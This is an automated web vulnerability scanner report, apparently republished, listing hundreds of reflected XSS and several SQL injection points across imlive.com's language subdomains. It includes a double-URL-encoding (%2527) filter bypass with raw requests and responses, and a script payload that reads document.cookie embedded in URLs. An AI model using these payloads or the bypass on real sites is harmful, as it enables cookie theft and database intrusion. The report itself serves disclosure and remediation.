Cross Site Scripting, XSS, imlive.com, CWE-79, CAPEC-86

XSS in imlive.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Jan 28 11:58:12 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://cafr.imlive.com/waccess/ [REST URL parameter 1]

1.2. http://de.imlive.com/waccess/ [REST URL parameter 1]

1.3. http://es.imlive.com/waccess/ [REST URL parameter 1]

1.4. http://fr.imlive.com/waccess/ [gotopage parameter]

1.5. http://gr.imlive.com/waccess/ [REST URL parameter 1]

1.6. http://it.imlive.com/waccess/ [REST URL parameter 1]

1.7. http://nl.imlive.com/waccess/ [REST URL parameter 1]

1.8. http://tr.imlive.com/waccess/ [REST URL parameter 1]

1.9. http://tr.imlive.com/waccess/ [gotopage parameter]

2. Cross-site scripting (reflected)

2.1. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

2.2. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

2.3. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

2.4. http://ar.imlive.com/waccess/ [cbname parameter]

2.5. http://ar.imlive.com/waccess/ [from parameter]

2.6. http://ar.imlive.com/waccess/ [promocode parameter]

2.7. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

2.8. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

2.9. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

2.10. http://br.imlive.com/waccess/ [cbname parameter]

2.11. http://br.imlive.com/waccess/ [from parameter]

2.12. http://br.imlive.com/waccess/ [gotopage parameter]

2.13. http://br.imlive.com/waccess/ [promocode parameter]

2.14. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.15. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.16. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.17. http://cafr.imlive.com/waccess/ [cbname parameter]

2.18. http://cafr.imlive.com/waccess/ [from parameter]

2.19. http://cafr.imlive.com/waccess/ [gotopage parameter]

2.20. http://cafr.imlive.com/waccess/ [promocode parameter]

2.21. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

2.22. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

2.23. http://de.imlive.com/waccess/ [cbname parameter]

2.24. http://de.imlive.com/waccess/ [from parameter]

2.25. http://de.imlive.com/waccess/ [gotopage parameter]

2.26. http://de.imlive.com/waccess/ [promocode parameter]

2.27. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

2.28. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

2.29. http://dk.imlive.com/waccess/ [cbname parameter]

2.30. http://dk.imlive.com/waccess/ [from parameter]

2.31. http://dk.imlive.com/waccess/ [gotopage parameter]

2.32. http://dk.imlive.com/waccess/ [promocode parameter]

2.33. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

2.34. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

2.35. http://es.imlive.com/waccess/ [cbname parameter]

2.36. http://es.imlive.com/waccess/ [from parameter]

2.37. http://es.imlive.com/waccess/ [gotopage parameter]

2.38. http://es.imlive.com/waccess/ [promocode parameter]

2.39. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.40. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.41. http://fr.imlive.com/waccess/ [gotopage parameter]

2.42. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.43. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.44. http://gr.imlive.com/waccess/ [cbname parameter]

2.45. http://gr.imlive.com/waccess/ [from parameter]

2.46. http://gr.imlive.com/waccess/ [gotopage parameter]

2.47. http://gr.imlive.com/waccess/ [promocode parameter]

2.48. http://imlive.com/ [name of an arbitrarily supplied request parameter]

2.49. http://imlive.com/ [name of an arbitrarily supplied request parameter]

2.50. http://imlive.com/SiteInformation.html [REST URL parameter 1]

2.51. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]

2.52. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]

2.53. http://imlive.com/become_celeb.asp [REST URL parameter 1]

2.54. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]

2.55. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]

2.56. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]

2.57. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]

2.58. http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter]

2.59. http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter]

2.60. http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter]

2.61. http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter]

2.62. http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter]

2.63. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]

2.64. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]

2.65. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]

2.66. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]

2.67. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]

2.68. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]

2.69. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]

2.70. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]

2.71. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]

2.72. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]

2.73. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]

2.74. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]

2.75. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]

2.76. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]

2.77. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]

2.78. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]

2.79. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]

2.80. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]

2.81. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]

2.82. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]

2.83. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]

2.84. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]

2.85. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]

2.86. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]

2.87. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]

2.88. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]

2.89. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]

2.90. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]

2.91. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]

2.92. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]

2.93. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]

2.94. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]

2.95. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]

2.96. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]

2.97. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]

2.98. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]

2.99. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]

2.100. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]

2.101. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]

2.102. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]

2.103. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]

2.104. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]

2.105. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]

2.106. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]

2.107. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]

2.108. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]

2.109. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]

2.110. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]

2.111. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]

2.112. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]

2.113. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]

2.114. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]

2.115. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]

2.116. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]

2.117. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]

2.118. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]

2.119. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]

2.120. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]

2.121. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]

2.122. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]

2.123. http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter]

2.124. http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter]

2.125. http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter]

2.126. http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter]

2.127. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]

2.128. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]

2.129. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]

2.130. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]

2.131. http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter]

2.132. http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter]

2.133. http://imlive.com/warningjx.aspx [redirect parameter]

2.134. http://imlive.com/warningms.asp [ms parameter]

2.135. http://imlive.com/warningms.asp [ms parameter]

2.136. http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter]

2.137. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]

2.138. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]

2.139. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]

2.140. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]

2.141. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]

2.142. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]

2.143. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]

2.144. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]

2.145. http://imlive.com/wmaster.ashx [gotopage parameter]

2.146. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]

2.147. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]

2.148. http://in.imlive.com/waccess/ [gotopage parameter]

2.149. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]

2.150. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]

2.151. http://it.imlive.com/waccess/ [gotopage parameter]

2.152. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]

2.153. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]

2.154. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]

2.155. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]

2.156. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]

2.157. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]

2.158. http://nl.imlive.com/waccess/ [gotopage parameter]

2.159. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]

2.160. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]

2.161. http://no.imlive.com/waccess/ [gotopage parameter]

2.162. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]

2.163. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]

2.164. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

2.165. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

2.166. http://ru.imlive.com/waccess/ [gotopage parameter]

2.167. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

2.168. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

2.169. http://se.imlive.com/waccess/ [gotopage parameter]

2.170. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.171. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.172. http://ar.imlive.com/ [Referer HTTP header]

2.173. http://ar.imlive.com/waccess/ [Referer HTTP header]

2.174. http://br.imlive.com/ [Referer HTTP header]

2.175. http://br.imlive.com/waccess/ [Referer HTTP header]

2.176. http://cafr.imlive.com/ [Referer HTTP header]

2.177. http://cafr.imlive.com/waccess/ [Referer HTTP header]

2.178. http://de.imlive.com/ [Referer HTTP header]

2.179. http://de.imlive.com/waccess/ [Referer HTTP header]

2.180. http://dk.imlive.com/ [Referer HTTP header]

2.181. http://dk.imlive.com/waccess/ [Referer HTTP header]

2.182. http://es.imlive.com/ [Referer HTTP header]

2.183. http://es.imlive.com/waccess/ [Referer HTTP header]

2.184. http://fr.imlive.com/ [Referer HTTP header]

2.185. http://fr.imlive.com/waccess/ [Referer HTTP header]

2.186. http://gr.imlive.com/ [Referer HTTP header]

2.187. http://gr.imlive.com/waccess/ [Referer HTTP header]

2.188. http://imlive.com/ [Referer HTTP header]

2.189. http://imlive.com/GuestDiscountClubs.aspx [Referer HTTP header]

2.190. http://imlive.com/SiteInformation.html [Referer HTTP header]

2.191. http://imlive.com/awardarena/ [Referer HTTP header]

2.192. http://imlive.com/become_celeb.asp [Referer HTTP header]

2.193. http://imlive.com/become_host.asp [Referer HTTP header]

2.194. http://imlive.com/becomehost.aspx [Referer HTTP header]

2.195. http://imlive.com/categoryfs.asp [Referer HTTP header]

2.196. http://imlive.com/categoryfs.asp [Referer HTTP header]

2.197. http://imlive.com/categoryms.asp [Referer HTTP header]

2.198. http://imlive.com/categoryms.asp [Referer HTTP header]

2.199. http://imlive.com/customerservice.asp [Referer HTTP header]

2.200. http://imlive.com/disclaimer.asp [Referer HTTP header]

2.201. http://imlive.com/forgot.asp [Referer HTTP header]

2.202. http://imlive.com/forgot.aspx [Referer HTTP header]

2.203. http://imlive.com/homepagems3.asp [Referer HTTP header]

2.204. http://imlive.com/hostmembers.asp [Referer HTTP header]

2.205. http://imlive.com/live-sex-chats/ [Referer HTTP header]

2.206. http://imlive.com/live-sex-chats/adult-shows/ [Referer HTTP header]

2.207. http://imlive.com/live-sex-chats/cam-girls/ [Referer HTTP header]

2.208. http://imlive.com/live-sex-chats/cam-girls/categories/ [Referer HTTP header]

2.209. http://imlive.com/live-sex-chats/cam-girls/hotspots/ [Referer HTTP header]

2.210. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [Referer HTTP header]

2.211. http://imlive.com/live-sex-chats/caught-on-cam/ [Referer HTTP header]

2.212. http://imlive.com/live-sex-chats/couple/ [Referer HTTP header]

2.213. http://imlive.com/live-sex-chats/fetish/ [Referer HTTP header]

2.214. http://imlive.com/live-sex-chats/fetish/categories/ [Referer HTTP header]

2.215. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [Referer HTTP header]

2.216. http://imlive.com/live-sex-chats/free-sex-video/ [Referer HTTP header]

2.217. http://imlive.com/live-sex-chats/gay-couple/ [Referer HTTP header]

2.218. http://imlive.com/live-sex-chats/gay/ [Referer HTTP header]

2.219. http://imlive.com/live-sex-chats/guy-alone/ [Referer HTTP header]

2.220. http://imlive.com/live-sex-chats/happyhour/ [Referer HTTP header]

2.221. http://imlive.com/live-sex-chats/lesbian-couple/ [Referer HTTP header]

2.222. http://imlive.com/live-sex-chats/lesbian/ [Referer HTTP header]

2.223. http://imlive.com/live-sex-chats/live-sex-video/ [Referer HTTP header]

2.224. http://imlive.com/live-sex-chats/nude-chat/ [Referer HTTP header]

2.225. http://imlive.com/live-sex-chats/orgies/ [Referer HTTP header]

2.226. http://imlive.com/live-sex-chats/pornstars/ [Referer HTTP header]

2.227. http://imlive.com/live-sex-chats/role-play/ [Referer HTTP header]

2.228. http://imlive.com/live-sex-chats/sex-show-galleries/ [Referer HTTP header]

2.229. http://imlive.com/live-sex-chats/sex-show-photos/ [Referer HTTP header]

2.230. http://imlive.com/live-sex-chats/sex-show-sessions/ [Referer HTTP header]

2.231. http://imlive.com/live-sex-chats/sex-video-features/ [Referer HTTP header]

2.232. http://imlive.com/live-sex-chats/shemale-couple/ [Referer HTTP header]

2.233. http://imlive.com/live-sex-chats/shemale/ [Referer HTTP header]

2.234. http://imlive.com/live-sex-chats/shy-girl/ [Referer HTTP header]

2.235. http://imlive.com/liveexperts.asp [Referer HTTP header]

2.236. http://imlive.com/localcompanionship.asp [Referer HTTP header]

2.237. http://imlive.com/login.asp [Referer HTTP header]

2.238. http://imlive.com/minglesingles.asp [Referer HTTP header]

2.239. http://imlive.com/pr.asp [Referer HTTP header]

2.240. http://imlive.com/preparesearch.asp [Referer HTTP header]

2.241. http://imlive.com/preparesearch.aspx [Referer HTTP header]

2.242. http://imlive.com/search.asp [Referer HTTP header]

2.243. http://imlive.com/sitemap.html [Referer HTTP header]

2.244. http://imlive.com/videosfr.asp [Referer HTTP header]

2.245. http://imlive.com/warningms.asp [Referer HTTP header]

2.246. http://imlive.com/webcam-advanced-search/ [Referer HTTP header]

2.247. http://imlive.com/webcam-faq/ [Referer HTTP header]

2.248. http://imlive.com/webcam-login/ [Referer HTTP header]

2.249. http://imlive.com/webcam-sign-up/ [Referer HTTP header]

2.250. http://imlive.com/wmaster.ashx [Referer HTTP header]

2.251. http://imlive.com/wmaster.ashx [Referer HTTP header]

2.252. http://in.imlive.com/ [Referer HTTP header]

2.253. http://in.imlive.com/waccess/ [Referer HTTP header]

2.254. http://it.imlive.com/ [Referer HTTP header]

2.255. http://it.imlive.com/waccess/ [Referer HTTP header]

2.256. http://jp.imlive.com/ [Referer HTTP header]

2.257. http://jp.imlive.com/waccess/ [Referer HTTP header]

2.258. http://mx.imlive.com/ [Referer HTTP header]

2.259. http://mx.imlive.com/waccess/ [Referer HTTP header]

2.260. http://nl.imlive.com/ [Referer HTTP header]

2.261. http://nl.imlive.com/waccess/ [Referer HTTP header]

2.262. http://no.imlive.com/ [Referer HTTP header]

2.263. http://no.imlive.com/waccess/ [Referer HTTP header]

2.264. http://pu.imlive.com/ [Referer HTTP header]

2.265. http://pu.imlive.com/waccess/ [Referer HTTP header]

2.266. http://ru.imlive.com/ [Referer HTTP header]

2.267. http://ru.imlive.com/waccess/ [Referer HTTP header]

2.268. http://se.imlive.com/ [Referer HTTP header]

2.269. http://se.imlive.com/waccess/ [Referer HTTP header]

2.270. http://tr.imlive.com/ [Referer HTTP header]

2.271. http://tr.imlive.com/waccess/ [Referer HTTP header]

3. Cleartext submission of password

3.1. http://ar.imlive.com/

3.2. http://br.imlive.com/

3.3. http://cafr.imlive.com/

3.4. http://de.imlive.com/

3.5. http://dk.imlive.com/

3.6. http://es.imlive.com/

3.7. http://fr.imlive.com/

3.8. http://gr.imlive.com/

3.9. http://imlive.com/

3.10. http://imlive.com/homepagems3.asp

3.11. http://imlive.com/webcam-login/

3.12. http://in.imlive.com/

3.13. http://it.imlive.com/

3.14. http://jp.imlive.com/

3.15. http://mx.imlive.com/

3.16. http://nl.imlive.com/

3.17. http://no.imlive.com/

3.18. http://pu.imlive.com/

3.19. http://ru.imlive.com/

3.20. http://se.imlive.com/

3.21. http://tr.imlive.com/

4. Cookie without HttpOnly flag set

4.1. http://imlive.com/homepagems3.asp

4.2. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

4.3. http://ar.imlive.com/

4.4. http://ar.imlive.com/waccess/

4.5. http://br.imlive.com/

4.6. http://br.imlive.com/waccess/

4.7. http://cafr.imlive.com/

4.8. http://cafr.imlive.com/waccess/

4.9. http://de.imlive.com/

4.10. http://de.imlive.com/waccess/

4.11. http://dk.imlive.com/

4.12. http://dk.imlive.com/waccess/

4.13. http://es.imlive.com/

4.14. http://es.imlive.com/waccess/

4.15. http://fr.imlive.com/

4.16. http://fr.imlive.com/waccess/

4.17. http://gr.imlive.com/

4.18. http://gr.imlive.com/waccess/

4.19. http://imlive.com/

4.20. http://imlive.com/GuestDiscountClubs.aspx

4.21. http://imlive.com/awardarena/

4.22. http://imlive.com/becomehost.aspx

4.23. http://imlive.com/categoryfs.asp

4.24. http://imlive.com/categoryms.asp

4.25. http://imlive.com/disclaimer.asp

4.26. http://imlive.com/live-sex-chats/

4.27. http://imlive.com/live-sex-chats/adult-shows/

4.28. http://imlive.com/live-sex-chats/cam-girls/

4.29. http://imlive.com/live-sex-chats/cam-girls/categories/

4.30. http://imlive.com/live-sex-chats/cam-girls/hotspots/

4.31. http://imlive.com/live-sex-chats/cams-aroundthehouse/

4.32. http://imlive.com/live-sex-chats/caught-on-cam/

4.33. http://imlive.com/live-sex-chats/couple/

4.34. http://imlive.com/live-sex-chats/fetish/

4.35. http://imlive.com/live-sex-chats/fetish/categories/

4.36. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/

4.37. http://imlive.com/live-sex-chats/free-sex-video/

4.38. http://imlive.com/live-sex-chats/gay-couple/

4.39. http://imlive.com/live-sex-chats/gay/

4.40. http://imlive.com/live-sex-chats/guy-alone/

4.41. http://imlive.com/live-sex-chats/happyhour/

4.42. http://imlive.com/live-sex-chats/lesbian-couple/

4.43. http://imlive.com/live-sex-chats/lesbian/

4.44. http://imlive.com/live-sex-chats/live-sex-video/

4.45. http://imlive.com/live-sex-chats/nude-chat/

4.46. http://imlive.com/live-sex-chats/orgies/

4.47. http://imlive.com/live-sex-chats/pornstars/

4.48. http://imlive.com/live-sex-chats/role-play/

4.49. http://imlive.com/live-sex-chats/sex-show-galleries/

4.50. http://imlive.com/live-sex-chats/sex-show-photos/

4.51. http://imlive.com/live-sex-chats/sex-show-sessions/

4.52. http://imlive.com/live-sex-chats/sex-video-features/

4.53. http://imlive.com/live-sex-chats/shemale-couple/

4.54. http://imlive.com/live-sex-chats/shemale/

4.55. http://imlive.com/live-sex-chats/shy-girl/

4.56. http://imlive.com/liveexperts.asp

4.57. http://imlive.com/localcompanionship.asp

4.58. http://imlive.com/minglesingles.asp

4.59. http://imlive.com/pr.asp

4.60. http://imlive.com/preparesearch.aspx

4.61. http://imlive.com/sex_webcams_index/index.asp

4.62. http://imlive.com/sitemap.html

4.63. http://imlive.com/videosfr.asp

4.64. http://imlive.com/warningms.asp

4.65. http://imlive.com/webcam-advanced-search/

4.66. http://imlive.com/webcam-faq/

4.67. http://imlive.com/webcam-login/

4.68. http://imlive.com/webcam-sign-up/

4.69. http://imlive.com/wmaster.ashx

4.70. http://in.imlive.com/

4.71. http://in.imlive.com/waccess/

4.72. http://it.imlive.com/

4.73. http://it.imlive.com/waccess/

4.74. http://jp.imlive.com/

4.75. http://jp.imlive.com/waccess/

4.76. http://mx.imlive.com/

4.77. http://mx.imlive.com/waccess/

4.78. http://nl.imlive.com/

4.79. http://nl.imlive.com/waccess/

4.80. http://no.imlive.com/

4.81. http://no.imlive.com/waccess/

4.82. http://pu.imlive.com/

4.83. http://pu.imlive.com/waccess/

4.84. http://ru.imlive.com/

4.85. http://ru.imlive.com/waccess/

4.86. http://se.imlive.com/

4.87. http://se.imlive.com/waccess/

4.88. http://tr.imlive.com/

4.89. http://tr.imlive.com/waccess/

5. Password field with autocomplete enabled

5.1. http://ar.imlive.com/

5.2. http://br.imlive.com/

5.3. http://cafr.imlive.com/

5.4. http://de.imlive.com/

5.5. http://dk.imlive.com/

5.6. http://es.imlive.com/

5.7. http://fr.imlive.com/

5.8. http://gr.imlive.com/

5.9. http://imlive.com/

5.10. http://imlive.com/homepagems3.asp

5.11. http://imlive.com/webcam-login/

5.12. http://in.imlive.com/

5.13. http://it.imlive.com/

5.14. http://jp.imlive.com/

5.15. http://mx.imlive.com/

5.16. http://nl.imlive.com/

5.17. http://no.imlive.com/

5.18. http://pu.imlive.com/

5.19. http://ru.imlive.com/

5.20. http://se.imlive.com/

5.21. http://tr.imlive.com/

6. HTML does not specify charset

6.1. http://br.imlive.com/NaN/

6.2. http://cafr.imlive.com/NaN/

6.3. http://imlive.com/categoryfs.asp

6.4. http://imlive.com/categoryms.asp

6.5. http://imlive.com/compliance.asp

6.6. http://imlive.com/disclaimer.asp

6.7. http://imlive.com/homepagems3.asp

6.8. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

6.9. http://imlive.com/liveexperts.asp

6.10. http://imlive.com/localcompanionship.asp

6.11. http://imlive.com/minglesingles.asp

6.12. http://imlive.com/pr.asp

6.13. http://imlive.com/sex_webcams_index/index.asp

6.14. http://imlive.com/sitemap.html

6.15. http://imlive.com/videosfr.asp

6.16. http://imlive.com/warningms.asp



1. SQL injection  next
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://cafr.imlive.com/waccess/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=NAMDOIMAEMHFENAMDMFANDKA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 8336
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
